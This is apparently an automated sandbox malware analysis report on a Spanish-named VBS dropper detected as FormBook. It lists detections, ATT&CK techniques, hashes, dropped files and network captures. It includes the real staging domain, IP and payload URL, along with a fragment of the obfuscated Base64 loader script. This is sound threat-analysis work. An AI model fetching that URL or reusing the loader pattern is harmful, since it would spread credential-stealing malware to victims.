Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	311 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	21 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TRANSFERENCIAS.vbs	11%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.adttemp.com.br	104.196.109.209	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.adttemp.com.br/Io2SD/sirdeeeeee.txt	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://transfer.adttemp.com.brd	temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.2079427255.0000000003236000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.196.109.209	transfer.adttemp.com.br	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525549
Start date and time:	2024-10-04 11:26:00 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TRANSFERENCIAS.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@5/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 28 Number of non-executed functions: 233
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TRANSFERENCIAS.vbs

Simulations

Behavior and APIs

Time	Type	Description
05:26:54	API Interceptor	1x Sleep call for process: temp_executable.exe modified
05:27:40	API Interceptor	3x Sleep call for process: RegAsm.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	FAKTURA-pdf-466366332.vbs	Get hash	malicious	Unknown	Browse	104.196.109.209
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.196.109.209
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.196.109.209
	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.196.109.209
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	104.196.109.209
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	104.196.109.209
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	104.196.109.209
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	104.196.109.209

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	54784
Entropy (8bit):	6.065657929991864
Encrypted:	false
SSDEEP:	768:Oe/+/MyPmzNgkCj1+Z9kowIQMJ3n9w7PPexQSKOPh1:sMQXj1y9ZwIQMJ3n9w7PPRW1
MD5:	4BB2987F85F87A6488CE3152D6B85077
SHA1:	25ABFC49BBF8437303478F2DC8D97140DB776E0A
SHA-256:	561EDC9EA0E5836B410835F7A3E3B33E1FF774CCA58491BC3FA7B168AAF5CD44
SHA-512:	0DDBA278DACFE04F53162F1AAB9EA437CE1911F9D2F1B19915AB09ABA16957831D4297AADAF0F5C0E99B967B16E76AB9886C18EE219C5AC7C128128B437A2AA3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A................................... ........@.. .......................`............`.................................p...K.... .......................@......!................................................ ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65486), with CRLF line terminators
Entropy (8bit):	4.4428118275464
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	TRANSFERENCIAS.vbs
File size:	209'181 bytes
MD5:	b378b2b63f8ee49548ea6e851b601321
SHA1:	8910d7499ed420934921e4407e18bdf92cc5bbae
SHA256:	c7da43b1032582ef7d03c48e749bbb56b18d2da5360a29341ada35ce67900e2e
SHA512:	d7e8855b13bc2ddeae4335e20175c3778db4323c487310c9e076c86d0ef829e6106ebc40c44bae991fc842436b1c8f7be8b6828818ef9409808adda028e7a6cc
SSDEEP:	3072:HKnp/niEJOFufFde+Knp/niEJOFufFde/mYp:qpO0fF0pO0fFomYp
TLSH:	BE148333DF066A6842975E7C8B05171BBC6C55B8A3B6EFD8D6E7581008F8636606B3CC
File Content Preview:	' Main Script Logic for Processing Base64 Data....' Initialize the Base64-encoded string (Replace "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 11:26:53.183587074 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:53.183644056 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:53.183813095 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:53.192122936 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:53.192137957 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:53.816209078 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:53.816400051 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:53.849817991 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:53.849833965 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:53.850785017 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:53.902782917 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.144140959 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.187408924 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256578922 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256654978 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256705046 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256715059 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256716013 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.256745100 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.256762028 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.257250071 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.257308006 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.257317066 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.257361889 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.275670052 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.275742054 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.344368935 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.344455004 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.344485044 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.344552994 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.345071077 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.345134974 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.345536947 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.345624924 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.345726013 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.345783949 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.346599102 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.346662998 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.362517118 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.362556934 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.362615108 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.362637997 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.362656116 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.402642012 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.430850983 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.431061029 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.431104898 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.431905031 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.431931019 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.431998014 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.432291985 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.432327986 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.432358027 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.432365894 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.432413101 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.433150053 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433182955 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433224916 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.433233976 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433263063 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.433851004 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433903933 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433932066 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.433942080 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.433953047 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.434665918 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.434698105 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.434732914 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.434746027 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.434772968 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.435760021 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.435837984 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.435852051 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.435944080 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.449120998 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.449206114 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.449239969 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.449306965 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.449316978 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.449359894 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.517734051 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.517894030 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.517916918 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.517995119 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.518349886 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.518430948 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.518439054 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.518485069 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.519001007 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.519084930 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.519167900 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.519263029 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.519326925 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.519335032 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.520097017 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.520175934 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.520184994 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.520898104 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.520975113 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.520982981 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.521270037 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.521363974 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.521370888 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.522051096 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.522128105 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.522135973 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.522854090 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.522934914 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.522943020 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.523046017 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.523108959 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.523116112 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.536789894 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.536911011 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.536916971 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.536946058 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.537022114 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.537048101 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.537115097 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.537147045 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.537194967 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.537317991 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.537389994 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.537816048 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.537882090 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.538147926 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.538218975 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.603892088 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604018927 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604120016 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604185104 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604204893 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604216099 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604223013 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604363918 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604487896 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604487896 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604496956 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604593039 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604679108 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604688883 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604712963 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604744911 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604856968 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604948044 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.604950905 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.604970932 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605000019 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.605293036 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605357885 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.605365038 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605403900 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605412006 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.605427027 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605480909 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.605520010 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605581999 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.605602980 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.605655909 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.606100082 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.606164932 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.606203079 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.606256962 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.606440067 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.606502056 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.606533051 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.606595993 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.606631994 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.606715918 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.607150078 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.607215881 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.607237101 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.607297897 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.607455015 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.607515097 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.607549906 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.607610941 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.607631922 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.607692003 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.608131886 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.608203888 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.608217955 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.608280897 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.622781992 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.622874022 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.622967005 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.622967005 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.622976065 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623007059 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623068094 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.623075962 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623092890 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623126030 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.623132944 CEST	443	49704	104.196.109.209	192.168.2.5
Oct 4, 2024 11:26:54.623167038 CEST	49704	443	192.168.2.5	104.196.109.209
Oct 4, 2024 11:26:54.623290062 CEST	443	49704	104.196.109.209	192.168.2.5
